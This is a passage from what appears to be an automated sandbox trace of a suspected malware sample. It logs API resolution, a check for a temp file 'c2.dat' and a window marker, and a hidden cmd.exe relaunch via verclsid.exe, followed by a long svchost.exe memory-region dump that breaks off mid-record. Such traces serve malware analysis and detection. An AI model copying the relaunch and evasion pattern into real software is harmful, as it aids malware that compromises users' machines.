[0526.000] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SHGetDesktopFolder", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18
[0526.001] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SHGetDesktopFolder", cchWideChar=18, lpMultiByteStr=0x1f68d00, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SHGetDesktopFolder", lpUsedDefaultChar=0x0) returned 18
[0526.001] GetProcAddress (hModule=0x7fefe4f0000, lpProcName="SHGetDesktopFolder") returned 0x7fefe518660
[0526.001] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SHGetFolderLocation", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19
[0526.001] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SHGetFolderLocation", cchWideChar=19, lpMultiByteStr=0x1f68d00, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SHGetFolderLocation", lpUsedDefaultChar=0x0) returned 19
[0526.001] GetProcAddress (hModule=0x7fefe4f0000, lpProcName="SHGetFolderLocation") returned 0x7fefe57a274
[0526.001] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SHParseDisplayName", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18
[0526.001] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SHParseDisplayName", cchWideChar=18, lpMultiByteStr=0x1f68d00, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SHParseDisplayName", lpUsedDefaultChar=0x0) returned 18
[0526.001] GetProcAddress (hModule=0x7fefe4f0000, lpProcName="SHParseDisplayName") returned 0x7fefe574570
[0526.001] LoadLibraryW (lpLibFileName="ole32.dll") returned 0x7feff780000
[0526.001] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitialize", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12
[0526.001] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitialize", cchWideChar=12, lpMultiByteStr=0x1f68d00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoInitialize", lpUsedDefaultChar=0x0) returned 12
[0526.001] GetProcAddress (hModule=0x7feff780000, lpProcName="CoInitialize") returned 0x7feff79a51c
[0526.003] LoadLibraryW (lpLibFileName="iphlpapi.dll") returned 0x7fefb670000
[0526.008] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetTcpTable", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11
[0526.008] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetTcpTable", cchWideChar=11, lpMultiByteStr=0x1f68d00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetTcpTable", lpUsedDefaultChar=0x0) returned 11
[0526.008] GetProcAddress (hModule=0x7fefb670000, lpProcName="GetTcpTable") returned 0x7fefb6813ac
[0526.008] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SetTcpEntry", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11
[0526.008] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SetTcpEntry", cchWideChar=11, lpMultiByteStr=0x1f68d00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetTcpEntry", lpUsedDefaultChar=0x0) returned 11
[0526.008] GetProcAddress (hModule=0x7fefb670000, lpProcName="SetTcpEntry") returned 0x7fefb682fb0
[0526.008] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IcmpCreateFile", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14
[0526.008] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IcmpCreateFile", cchWideChar=14, lpMultiByteStr=0x1f68d00, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IcmpCreateFile", lpUsedDefaultChar=0x0) returned 14
[0526.008] GetProcAddress (hModule=0x7fefb670000, lpProcName="IcmpCreateFile") returned 0x7fefb678250
[0526.008] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IcmpCloseHandle", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15
[0526.008] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IcmpCloseHandle", cchWideChar=15, lpMultiByteStr=0x1f68d00, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IcmpCloseHandle", lpUsedDefaultChar=0x0) returned 15
[0526.008] GetProcAddress (hModule=0x7fefb670000, lpProcName="IcmpCloseHandle") returned 0x7fefb677cc0
[0526.008] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IcmpSendEcho", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12
[0526.009] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IcmpSendEcho", cchWideChar=12, lpMultiByteStr=0x1f68d00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IcmpSendEcho", lpUsedDefaultChar=0x0) returned 12
[0526.009] GetProcAddress (hModule=0x7fefb670000, lpProcName="IcmpSendEcho") returned 0x7fefb678340
[0526.009] DisableThreadLibraryCalls (hLibModule=0x1c30000) returned 1
[0526.009] GetCommandLineW () returned="verclsid.exe /S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7}"
[0526.009] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="Control_RunDLL", cbMultiByte=14, lpWideCharStr=0xecb40, cchWideChar=2047 | out: lpWideCharStr="Control_RunDLL") returned 14
[0535.376] DllGetClassObject (in: rclsid=0x2e7110*(Data1=0xa78ed123, Data2=0xab77, Data3=0x406b, Data4=([0]=0x99, [1]=0x99, [2]=0x2a, [3]=0x5d, [4]=0x9d, [5]=0x2f, [6]=0x7f, [7]=0xb7)), riid=0x7feff906cd0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xee810 | out: ppv=0xee810*=0x0) returned 0x0
[0535.376] GetCommandLineW () returned="verclsid.exe /S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7}"
[0535.380] FindWindowW (lpClassName="msprotB7", lpWindowName="") returned 0x0
[0535.381] GetTempPathW (in: nBufferLength=0x105, lpBuffer=0xee3e6 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25
[0535.382] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43
[0535.383] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat", cchWideChar=43, lpMultiByteStr=0x1f3d9e0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat", lpUsedDefaultChar=0x0) returned 43
[0535.383] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat", cbMultiByte=43, lpWideCharStr=0xed300, cchWideChar=2047 | out: lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat") returned 43
[0535.383] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\c2.dat"), lpFindFileData=0xee390 | out: lpFindFileData=0xee390*(dwFileAttributes=0x2e6a30, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x2e6a30, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x1c436fd, nFileSizeHigh=0x0, nFileSizeLow=0xee3b0, dwReserved0=0x0, dwReserved1=0xee3d8, cFileName="", cAlternateFileName="߾")) returned 0xffffffffffffffff
[0535.386] ShellExecuteW (hwnd=0x0, lpOperation="open", lpFile="cmd.exe", lpParameters="/c start \"\" verclsid.exe /M /S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7} & Exit", lpDirectory=0x0, nShowCmd=0) returned 0x2a
Thread:
id = 220
os_tid = 0x654
Thread:
id = 221
os_tid = 0x27c
Thread:
id = 222
os_tid = 0x594
Process:
id = "27"
image_name = "svchost.exe"
filename = "c:\\windows\\system32\\svchost.exe"
page_root = "0x7474000"
os_pid = "0x370"
os_integrity_level = "0x4000"
os_privileges = "0xe60b1e890"
monitor_reason = "rpc_server"
parent_id = "25"
os_parent_pid = "0x1d0"
cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs"
cur_dir = "C:\\Windows\\system32\\"
os_username = "NT AUTHORITY\\SYSTEM"
bitness = "32"
os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000df09" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]
Region:
id = 4017
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 4018
start_va = 0x20000
end_va = 0x20fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "svchost.exe.mui"
filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui")
Region:
id = 4019
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 4020
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 4021
start_va = 0x50000
end_va = 0x50fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 4022
start_va = 0x60000
end_va = 0x6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000060000"
filename = ""
Region:
id = 4023
start_va = 0x70000
end_va = 0x70fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000070000"
filename = ""
Region:
id = 4024
start_va = 0x80000
end_va = 0x80fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000080000"
filename = ""
Region:
id = 4025
start_va = 0x90000
end_va = 0x90fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000090000"
filename = ""
Region:
id = 4026
start_va = 0xa0000
end_va = 0xa0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000a0000"
filename = ""
Region:
id = 4027
start_va = 0xb0000
end_va = 0x12ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000b0000"
filename = ""
Region:
id = 4028
start_va = 0x130000
end_va = 0x196fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 4029
start_va = 0x1a0000
end_va = 0x29ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001a0000"
filename = ""
Region:
id = 4030
start_va = 0x2a0000
end_va = 0x2aafff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gpsvc.dll.mui"
filename = "\\Windows\\System32\\en-US\\gpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\gpsvc.dll.mui")
Region:
id = 4031
start_va = 0x2b0000
end_va = 0x3affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002b0000"
filename = ""
Region:
id = 4032
start_va = 0x3b0000
end_va = 0x537fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003b0000"
filename = ""
Region:
id = 4033
start_va = 0x540000
end_va = 0x6c0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000540000"
filename = ""
Region:
id = 4034
start_va = 0x6d0000
end_va = 0x78ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006d0000"
filename = ""
Region:
id = 4035
start_va = 0x790000
end_va = 0x79cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "setupapi.dll.mui"
filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui")
Region:
id = 4036
start_va = 0x7a0000
end_va = 0x7a3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "taskcomp.dll.mui"
filename = "\\Windows\\System32\\en-US\\taskcomp.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\taskcomp.dll.mui")
Region:
id = 4037
start_va = 0x7b0000
end_va = 0x7b9fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "schedsvc.dll.mui"
filename = "\\Windows\\System32\\en-US\\schedsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\schedsvc.dll.mui")
Region:
id = 4038
start_va = 0x7c0000
end_va = 0x7c0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000007c0000"
filename = ""
Region:
id = 4039
start_va = 0x7d0000
end_va = 0x7d1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000007d0000"
filename = ""
Region:
id = 4040
start_va = 0x7e0000
end_va = 0x7effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000007e0000"
filename = ""
Region:
id = 4041
start_va = 0x7f0000
end_va = 0x86ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000007f0000"
filename = ""
Region:
id = 4042
start_va = 0x870000
end_va = 0x8effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000870000"
filename = ""
Region:
id = 4043
start_va = 0x8f0000
end_va = 0x96ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008f0000"
filename = ""
Region:
id = 4044
start_va = 0x970000
end_va = 0x973fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 4045
start_va = 0x980000
end_va = 0x981fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000980000"
filename = ""
Region:
id = 4046
start_va = 0x990000
end_va = 0x9bffff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000019.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000019.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000019.db")
Region:
id = 4047
start_va = 0x9c0000
end_va = 0x9c3fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 4048
start_va = 0x9d0000
end_va = 0x9ddfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "propsys.dll.mui"
filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui")
Region:
id = 4049
start_va = 0x9e0000
end_va = 0xa5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009e0000"
filename = ""
Region:
id = 4050
start_va = 0xa90000
end_va = 0xb0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a90000"
filename = ""
Region:
id = 4051
start_va = 0xb10000
end_va = 0xddefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 4052
start_va = 0xe40000
end_va = 0xebffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000e40000"
filename = ""
Region:
id = 4053
start_va = 0xec0000
end_va = 0xf25fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db")
Region:
id = 4054
start_va = 0xf30000
end_va = 0xfaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000f30000"
filename = ""
Region:
id = 4055
start_va = 0x1020000
end_va = 0x109ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001020000"
filename = ""
Region:
id = 4056
start_va = 0x1130000
end_va = 0x11affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001130000"
filename = ""
Region:
id = 4057
start_va = 0x11e0000
end_va = 0x125ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000011e0000"
filename = ""
Region:
id = 4058
start_va = 0x12f0000
end_va = 0x136ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000012f0000"
filename = ""
Region:
id = 4059
start_va = 0x13a0000
end_va = 0x141ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000013a0000"
filename = ""
Region:
id = 4060
start_va = 0x1470000
end_va = 0x14effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001470000"
filename = ""
Region:
id = 4061
start_va = 0x1510000
end_va = 0x158ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001510000"
filename = ""
Region:
id = 4062
start_va = 0x1590000
end_va = 0x160ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001590000"
filename = ""
Region:
id = 4063
start_va = 0x1630000
end_va = 0x16affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001630000"
filename = ""
Region:
id = 4064
start_va = 0x16e0000
end_va = 0x175ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000016e0000"
filename = ""
Region:
id = 4065
start_va = 0x17b0000
end_va = 0x182ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000017b0000"
filename = ""
Region:
id = 4066
start_va = 0x1830000
end_va = 0x18affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001830000"
filename = ""
Region:
id = 4067
start_va = 0x1900000
end_va = 0x197ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001900000"
filename = ""
Region:
id = 4068
start_va = 0x19a0000
end_va = 0x1a1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000019a0000"
filename = ""
Region:
id = 4069
start_va = 0x1a30000
end_va = 0x1aaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001a30000"
filename = ""
Region:
id = 4070
start_va = 0x1ab0000
end_va = 0x1baffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001ab0000"
filename = ""
Region:
id = 4071
start_va = 0x1bb0000
end_va = 0x1caffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001bb0000"
filename = ""
Region:
id = 4072
start_va = 0x77a10000
end_va = 0x77b09fff
monitored = 0
entry_point = 0x77a2a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 4073
start_va = 0x77b10000
end_va = 0x77c2efff
monitored = 0
entry_point = 0x77b25340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 4074
start_va = 0x77c30000
end_va = 0x77dd8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 4075
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 4076
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 4077
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 4078
start_va = 0xff3f0000
end_va = 0xff3fafff
monitored = 0
entry_point = 0xff3f246c
region_type = mapped_file
name = "svchost.exe"
filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")
Region:
id = 4079
start_va = 0x7fefab50000
end_va = 0x7fefab58fff
monitored = 0
entry_point = 0x7fefab511a0
region_type = mapped_file
name = "tschannel.dll"
filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll")
Region:
id = 4080
start_va = 0x7fefad60000
end_va = 0x7fefadd6fff
monitored = 0
entry_point = 0x7fefad6afd0
region_type = mapped_file
name = "taskcomp.dll"
filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll")
Region:
id = 4081
start_va = 0x7fefade0000
end_va = 0x7fefadeefff
monitored = 0
entry_point = 0x7fefade7e80
region_type = mapped_file
name = "wiarpc.dll"
filename = "\\Windows\\System32\\wiarpc.dll" (normalized: "c:\\windows\\system32\\wiarpc.dll")
Region:
id = 4082
start_va = 0x7fefadf0000
end_va = 0x7fefadf9fff
monitored = 0
entry_point = 0x7fefadf260c
region_type = mapped_file
name = "ktmw32.dll"
filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll")
Region:
id = 4083
start_va = 0x7fefae00000
end_va = 0x7fefaf11fff
monitored = 0
entry_point = 0x7fefae1f354
region_type = mapped_file
name = "schedsvc.dll"
filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll")
Region:
id = 4084
start_va = 0x7fefaf20000
end_va = 0x7fefaf28fff
monitored = 0
entry_point = 0x7fefaf23668
region_type = mapped_file
name = "fvecerts.dll"
filename = "\\Windows\\System32\\fvecerts.dll" (normalized: "c:\\windows\\system32\\fvecerts.dll")
Region:
id = 4085
start_va = 0x7fefaf30000
end_va = 0x7fefaf38fff
monitored = 0
entry_point = 0x7fefaf31020
region_type = mapped_file
name = "tbs.dll"
filename = "\\Windows\\System32\\tbs.dll" (normalized: "c:\\windows\\system32\\tbs.dll")
Region:
id = 4086
start_va = 0x7fefaf40000
end_va = 0x7fefaf95fff
monitored = 0
entry_point = 0x7fefaf41040
region_type = mapped_file
name = "fveapi.dll"
filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll")
Region:
id = 4087
start_va = 0x7fefafa0000
end_va = 0x7fefaffdfff
monitored = 0
entry_point = 0x7fefafa9024
region_type = mapped_file
name = "shsvcs.dll"
filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll")
Region:
id = 4088
start_va = 0x7fefb640000
end_va = 0x7fefb653fff
monitored = 0
entry_point = 0x7fefb643e64
region_type = mapped_file
name = "sens.dll"
filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll")
Region:
id = 4089
start_va = 0x7fefb6a0000
end_va = 0x7fefb706fff
monitored = 0
entry_point = 0x7fefb6b6060
region_type = mapped_file
name = "es.dll"
filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll")
Region:
id = 4090
start_va = 0x7fefb720000
end_va = 0x7fefb72afff
monitored = 0
entry_point = 0x7fefb724f8c
region_type = mapped_file
name = "slc.dll"
filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll")
Region:
id = 4091
start_va = 0x7fefb730000
end_va = 0x7fefb73bfff
monitored = 0
entry_point = 0x7fefb7315d8
region_type = mapped_file
name = "dsrole.dll"
filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll")
Region:
id = 4092
start_va = 0x7fefb740000
end_va = 0x7fefb74ffff
monitored = 0
entry_point = 0x7fefb74835c
region_type = mapped_file
name = "themeservice.dll"
filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll")
Region:
id = 4093
start_va = 0x7fefb750000
end_va = 0x7fefb768fff
monitored = 0
entry_point = 0x7fefb7511a8
region_type = mapped_file
name = "atl.dll"
filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll")
Region:
id = 4094
start_va = 0x7fefb770000
end_va = 0x7fefb7a6fff
monitored = 0
entry_point = 0x7fefb778424
region_type = mapped_file
name = "profsvc.dll"
filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll")
Region:
id = 4095
start_va = 0x7fefb7f0000
end_va = 0x7fefb804fff
monitored = 0
entry_point = 0x7fefb7f60d8
region_type = mapped_file
name = "nlaapi.dll"
filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")
Region:
id = 4096
start_va = 0x7fefb810000
end_va = 0x7fefb8d1fff
monitored = 0
entry_point = 0x7fefb81101c
region_type = mapped_file
name = "gpsvc.dll"
filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll")
Region:
id = 4097
start_va = 0x7fefbaf0000
end_va = 0x7fefbb0cfff
monitored = 0
entry_point = 0x7fefbaf2f18
region_type = mapped_file
name = "mmcss.dll"
filename = "\\Windows\\System32\\mmcss.dll" (normalized: "c:\\windows\\system32\\mmcss.dll")
Region:
id = 4098
start_va = 0x7fefbb10000
